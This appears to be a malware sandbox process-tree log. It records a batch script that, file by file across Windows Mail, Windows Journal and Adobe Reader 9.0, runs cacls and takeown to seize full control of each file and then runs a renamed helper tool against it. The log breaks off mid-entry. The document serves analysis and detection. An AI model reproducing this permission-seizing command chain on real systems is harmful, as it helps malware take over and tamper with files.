C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Journal.exe" /E /G Admin:F /C3⤵PID:1032
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Journal.exe"3⤵
- Modifies file permissions
PID:2044
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "Journal.exe" -nobanner3⤵PID:548
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "Journal.exe" -nobanner4⤵PID:1064
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:980
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files\Windows Journal\Templates\Month_Calendar.jtp""2⤵PID:904
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Month_Calendar.jtp" /E /G Admin:F /C3⤵PID:1960
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Month_Calendar.jtp"3⤵PID:524
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "Month_Calendar.jtp" -nobanner3⤵PID:228
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "Month_Calendar.jtp" -nobanner4⤵PID:1368
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:896
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files\Windows Mail\wabmig.exe""2⤵PID:1552
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\wabmig.exe" /E /G Admin:F /C3⤵PID:948
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\wabmig.exe"3⤵PID:1156
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "wabmig.exe" -nobanner3⤵PID:364
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "wabmig.exe" -nobanner4⤵PID:760
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:360
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Windows Mail\WinMail.exe""2⤵PID:1488
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\WinMail.exe" /E /G Admin:F /C3⤵PID:544
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\WinMail.exe"3⤵PID:676
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "WinMail.exe" -nobanner3⤵PID:1496
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "WinMail.exe" -nobanner4⤵PID:204
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1828
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf""2⤵PID:1376
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf" /E /G Admin:F /C3⤵PID:1244
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf"3⤵PID:896
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "MyriadCAD.otf" -nobanner3⤵PID:236
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "MyriadCAD.otf" -nobanner4⤵PID:1848
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:948
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif""2⤵PID:744
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif" /E /G Admin:F /C3⤵PID:364
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif"3⤵PID:360
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "bl.gif" -nobanner3⤵PID:1216
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "bl.gif" -nobanner4⤵PID:436
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:908
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif""2⤵PID:676
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif" /E /G Admin:F /C3⤵PID:1292
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_distributed.gif"3⤵PID:1644
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "forms_distributed.gif" -nobanner3⤵PID:548
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "forms_distributed.gif" -nobanner4⤵PID:320
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:280
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif""2⤵PID:896
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif" /E /G Admin:F /C3⤵PID:1224
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif"3⤵PID:1156
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "reviewers.gif" -nobanner3⤵PID:228
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "reviewers.gif" -nobanner4⤵PID:864
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1576
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif""2⤵PID:360
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif" /E /G Admin:F /C3⤵PID:1552
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif"3⤵PID:592
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "rss.gif" -nobanner3⤵PID:760
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "rss.gif" -nobanner4⤵PID:1220
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1496
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif""2⤵PID:1644
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif" /E /G Admin:F /C3⤵PID:216
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\trash.gif"3⤵PID:952
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "trash.gif" -nobanner3⤵PID:984
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "trash.gif" -nobanner4⤵PID:1240
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:220
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V""2⤵PID:1156
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V" /E /G Admin:F /C3⤵PID:1080
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V"3⤵PID:364
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "Identity-V" -nobanner3⤵PID:1652
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "Identity-V" -nobanner4⤵PID:1848
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1572
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf""2⤵PID:592
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf" /E /G Admin:F /C3⤵PID:1180
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf"3⤵
- Modifies file permissions
PID:524
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "MinionPro-It.otf" -nobanner3⤵PID:436
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "MinionPro-It.otf" -nobanner4⤵PID:1820
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:548
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm""2⤵PID:952
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm" /E /G Admin:F /C3⤵PID:676
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm"3⤵PID:1068
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "zy______.pfm" -nobanner3⤵PID:320
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "zy______.pfm" -nobanner4⤵PID:1488
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:228
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt""2⤵PID:1836
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt" /E /G Admin:F /C3⤵PID:1848
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt"3⤵PID:908
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "DisplayLanguageNames.en_US.txt" -nobanner3⤵PID:1572
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "DisplayLanguageNames.en_US.txt" -nobanner4⤵PID:1896
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1292
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp""2⤵PID:1496
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp" /E /G Admin:F /C3⤵PID:1820
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp"3⤵
- Modifies file permissions
PID:216
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "can.hyp" -nobanner3⤵PID:548
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "can.hyp" -nobanner4⤵PID:592
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1224
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp""2⤵PID:236
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp" /E /G Admin:F /C3⤵PID:1488
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp"3⤵
- Modifies file permissions
PID:1520
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "usa03.hsp" -nobanner3⤵PID:228
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "usa03.hsp" -nobanner4⤵PID:1840
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1652
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT""2⤵PID:544
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT" /E /G Admin:F /C3⤵PID:1896
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT"3⤵
- Modifies file permissions
PID:1180
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "CORPCHAR.TXT" -nobanner3⤵PID:1292
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "CORPCHAR.TXT" -nobanner4⤵PID:1836
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:436
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT""2⤵PID:280
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT" /E /G Admin:F /C3⤵PID:592
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT"3⤵PID:676
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "TURKISH.TXT" -nobanner3⤵PID:524
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "TURKISH.TXT" -nobanner4⤵PID:1496
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:320
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT""2⤵PID:1576
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT" /E /G Admin:F /C3⤵PID:1840
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT"3⤵
- Modifies file permissions
PID:1848
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "CP1258.TXT" -nobanner3⤵PID:1652
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "CP1258.TXT" -nobanner4⤵PID:236
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1572
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif""2⤵PID:232
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif" /E /G Admin:F /C3⤵PID:1836
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif"3⤵
- Modifies file permissions
PID:1820
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "ended_review_or_form.gif" -nobanner3⤵PID:436
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "ended_review_or_form.gif" -nobanner4⤵PID:544
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:548
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files\Windows Journal\en-US\PDIALOG.exe.mui""2⤵PID:948
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\en-US\PDIALOG.exe.mui" /E /G Admin:F /C3⤵PID:1496
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\en-US\PDIALOG.exe.mui"3⤵PID:1488
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "PDIALOG.exe.mui" -nobanner3⤵PID:1032
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "PDIALOG.exe.mui" -nobanner4⤵PID:1968
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:904
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files\Windows Journal\Templates\Memo.jtp""2⤵PID:1848
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Memo.jtp" /E /G Admin:F /C3⤵PID:1368
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Memo.jtp"3⤵PID:1828
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "Memo.jtp" -nobanner3⤵PID:1520
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "Memo.jtp" -nobanner4⤵PID:952
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:364
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif""2⤵PID:908
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif" /E /G Admin:F /C3⤵PID:436
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif"3⤵
- Modifies file permissions
PID:984
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "open_original_form.gif" -nobanner3⤵PID:1180
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "open_original_form.gif" -nobanner4⤵PID:980
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1052
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files\Windows Mail\wab.exe""2⤵PID:1488
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\wab.exe" /E /G Admin:F /C3⤵PID:216
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\wab.exe"3⤵PID:224
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "wab.exe" -nobanner3⤵PID:948
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "wab.exe" -nobanner4⤵PID:1216
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1652
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif""2⤵PID:1828
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif" /E /G Admin:F /C3⤵PID:1576
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_same_reviewers.gif"3⤵
- Modifies file permissions
PID:1820
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "review_same_reviewers.gif" -nobanner3⤵PID:236
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "review_same_reviewers.gif" -nobanner4⤵PID:1068
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1220
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif""2⤵PID:984
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif" /E /G Admin:F /C3⤵PID:980
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif"3⤵PID:992
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "tl.gif" -nobanner3⤵PID:1920
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "tl.gif" -nobanner4⤵PID:744
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1552
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm""2⤵PID:904
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm" /E /G Admin:F /C3⤵PID:1216
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\ReadMe.htm"3⤵
- Modifies file permissions
PID:1572
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "ReadMe.htm" -nobanner3⤵PID:1652
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "ReadMe.htm" -nobanner4⤵PID:1488
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:204
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf""2⤵PID:1836
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf" /E /G Admin:F /C3⤵PID:1068
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf"3⤵
- Modifies file permissions
PID:212
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "MinionPro-Bold.otf" -nobanner3⤵PID:1220
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "MinionPro-Bold.otf" -nobanner4⤵PID:1828
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1080
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig""2⤵PID:1496
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig" /E /G Admin:F /C3⤵PID:744
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\cryptocme2.sig"3⤵PID:2044
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "cryptocme2.sig" -nobanner3⤵PID:1552
-
